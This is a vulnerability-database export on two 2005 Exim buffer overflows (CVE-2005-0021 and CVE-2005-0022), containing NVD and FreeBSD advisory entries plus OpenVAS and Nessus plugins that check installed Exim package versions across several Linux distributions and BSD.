{"cve": [{"lastseen": "2019-05-29T18:08:12", "bulletinFamily": "NVD", "description": "Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.", "modified": "2017-10-11T01:29:00", "id": "CVE-2005-0022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0022", "published": "2005-05-02T04:00:00", "title": "CVE-2005-0022", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:12", "bulletinFamily": "NVD", "description": "Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.", "modified": "2017-10-11T01:29:00", "id": "CVE-2005-0021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0021", "published": "2005-05-02T04:00:00", "title": "CVE-2005-0021", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:06", "bulletinFamily": "unix", "description": "\n1. The function host_aton() can overflow a buffer\n\t if it is presented with an illegal IPv6 address\n\t that has more than 8 components.\n2. The second report described a buffer overflow\n\t in the function spa_base64_to_bits(), which is part\n\t of the code for SPA authentication.\n", "modified": "2005-01-18T00:00:00", "published": "2005-01-05T00:00:00", "id": "CA9CE879-5EBB-11D9-A01C-0050569F0001", "href": "https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html", "title": "exim -- two buffer overflow vulnerabilities", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200501-23.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54809", "id": "OPENVAS:54809", "title": "Gentoo Security Advisory GLSA 200501-23 (exim)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Buffer overflow vulnerabilities, which could lead to arbitrary code\nexecution, have been found in the handling of IPv6 addresses as well as in\nthe SPA authentication mechanism in Exim.\";\ntag_solution = \"All Exim users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.43-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200501-23\nhttp://bugs.gentoo.org/show_bug.cgi?id=76893\nhttp://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200501-23.\";\n\n \n\nif(description)\n{\n script_id(54809);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200501-23 (exim)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"mail-mta/exim\", unaffected: make_list(\"ge 4.43-r2\"), vulnerable: make_list(\"lt 4.43-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:24", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-16T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=52252", "id": "OPENVAS:52252", "title": "exim -- two buffer overflow vulnerabilities", "type": "openvas", "sourceData": "#\n#VID ca9ce879-5ebb-11d9-a01c-0050569f0001\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n exim\n exim-ldap\n exim-ldap2\n exim-mysql\n exim-postgresql\n exim-sa-exim\n\nCVE-2005-0021\nMultiple buffer overflows in Exim before 4.43 may allow attackers to\nexecute arbitrary code via (1) an IPv6 address with more than 8\ncomponents, as demonstrated using the -be command line option, which\ntriggers an overflow in the host_aton function, or (2) the -bh command\nline option or dnsdb PTR lookup, which triggers an overflow in the\ndns_build_reverse function.\n\nCVE-2005-0022\nBuffer overflow in the spa_base64_to_bits function in Exim before\n4.43, as originally obtained from Samba code, and as called by the\nauth_spa_client function, may allow attackers to execute arbitrary\ncode during SPA authentication.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\nhttp://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\nhttp://www.vuxml.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52252);\n script_version(\"$Revision: 4078 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-16 07:34:17 +0200 (Fri, 16 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185,12188,12268);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"exim -- two buffer overflow vulnerabilities\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"exim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"exim-ldap\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim-ldap version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"exim-ldap2\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim-ldap2 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"exim-mysql\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim-mysql version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"exim-postgresql\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim-postgresql version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"exim-sa-exim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.43+28_1\")<0) {\n txt += 'Package exim-sa-exim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update to exim\nannounced via advisory DSA 635-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53472", "id": "OPENVAS:53472", "title": "Debian Security Advisory DSA 635-1 (exim)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_635_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 635-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Philip Hazel announced a buffer overflow in the host_aton function in\nexim, the default mail-tranport-agent in Debian, which can lead to the\nexecution of arbitrary code via an illegal IPv6 address.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-1woody4.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.36-13 of exim and 4.34-10 of exim4.\n\nWe recommend that you upgrade your exim and exim4 packages.\";\ntag_summary = \"The remote host is missing an update to exim\nannounced via advisory DSA 635-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20635-1\";\n\nif(description)\n{\n script_id(53472);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:56:38 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-0021\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 635-1 (exim)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim\", ver:\"3.35-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon\", ver:\"3.35-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update to exim-tls\nannounced via advisory DSA 637-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53474", "id": "OPENVAS:53474", "title": "Debian Security Advisory DSA 637-1 (exim-tls)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_637_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 637-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Philip Hazel announced a buffer overflow in the host_aton function in\nexim-tls, the SSL-enabled version of the default mail-tranport-agent\nin Debian, which can lead to the execution of arbitrary code via an\nillegal IPv6 address.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-3woody3.\n\nIn the unstable distribution (sid) this package does not exist\nanymore.\n\nWe recommend that you upgrade your exim-tls package.\";\ntag_summary = \"The remote host is missing an update to exim-tls\nannounced via advisory DSA 637-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20637-1\";\n\nif(description)\n{\n script_id(53474);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:56:38 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-0021\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 637-1 (exim-tls)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim-tls\", ver:\"3.35-3woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:08:24", "bulletinFamily": "scanner", "description": "Updated exim packages that resolve security issues are now available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nExim is a mail transport agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet.\n\nA buffer overflow was discovered in the spa_base64_to_bits function in Exim, as originally obtained from Samba code. If SPA authentication is enabled, a remote attacker may be able to exploit this vulnerability to execute arbitrary code as the 'exim' user. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-0022 to this issue. Please note that SPA authentication is not enabled by default in Red Hat Enterprise Linux 4.\n\nBuffer overflow flaws were discovered in the host_aton and dns_build_reverse functions in Exim. A local user can trigger these flaws by executing exim with carefully crafted command line arguments and may be able to gain the privileges of the 'exim' account. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-0021 to this issue.\n\nUsers of Exim are advised to update to these erratum packages which contain backported patches to correct these issues.", "modified": "2018-11-15T00:00:00", "id": "REDHAT-RHSA-2005-025.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=17165", "published": "2005-02-22T00:00:00", "title": "RHEL 4 : exim (RHSA-2005:025)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:025. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17165);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 11:40:29\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_xref(name:\"RHSA\", value:\"2005:025\");\n\n script_name(english:\"RHEL 4 : exim (RHSA-2005:025)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated exim packages that resolve security issues are now available\nfor Red Hat Enterprise Linux 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nExim is a mail transport agent (MTA) developed at the University of\nCambridge for use on Unix systems connected to the Internet.\n\nA buffer overflow was discovered in the spa_base64_to_bits function in\nExim, as originally obtained from Samba code. If SPA authentication is\nenabled, a remote attacker may be able to exploit this vulnerability\nto execute arbitrary code as the 'exim' user. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2005-0022 to this issue. Please note that SPA authentication\nis not enabled by default in Red Hat Enterprise Linux 4.\n\nBuffer overflow flaws were discovered in the host_aton and\ndns_build_reverse functions in Exim. A local user can trigger these\nflaws by executing exim with carefully crafted command line arguments\nand may be able to gain the privileges of the 'exim' account. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2005-0021 to this issue.\n\nUsers of Exim are advised to update to these erratum packages which\ncontain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-0021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-0022\"\n );\n # http://www.exim.org/mail-archives/exim-users/Week-of-Mon-20050103/msg00028.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1855ef75\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:025\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:exim-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:exim-sa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:025\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"exim-4.43-1.RHEL4.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"exim-doc-4.43-1.RHEL4.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"exim-mon-4.43-1.RHEL4.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"exim-sa-4.43-1.RHEL4.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-doc / exim-mon / exim-sa\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:41", "bulletinFamily": "scanner", "description": "This erratum fixes two relatively minor security issues which were discovered in Exim in the last few weeks. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2005-0021 and CVE-2005-0022 to these, respectively.\n\n1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication. This code originated in the Samba project. The overflow can be exploited only if you are using SPA authentication.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-07-19T00:00:00", "id": "FEDORA_2005-002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62248", "published": "2012-09-24T00:00:00", "title": "Fedora Core 3 : exim-4.43-1.FC3.1 (2005-002)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-002.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62248);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/19 23:19:04\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_xref(name:\"FEDORA\", value:\"2005-002\");\n\n script_name(english:\"Fedora Core 3 : exim-4.43-1.FC3.1 (2005-002)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This erratum fixes two relatively minor security issues which were\ndiscovered in Exim in the last few weeks. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the names\nCVE-2005-0021 and CVE-2005-0022 to these, respectively.\n\n1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication. This code originated in the Samba project. The\noverflow can be exploited only if you are using SPA authentication.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-January/000587.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1811cf14\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim-sa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 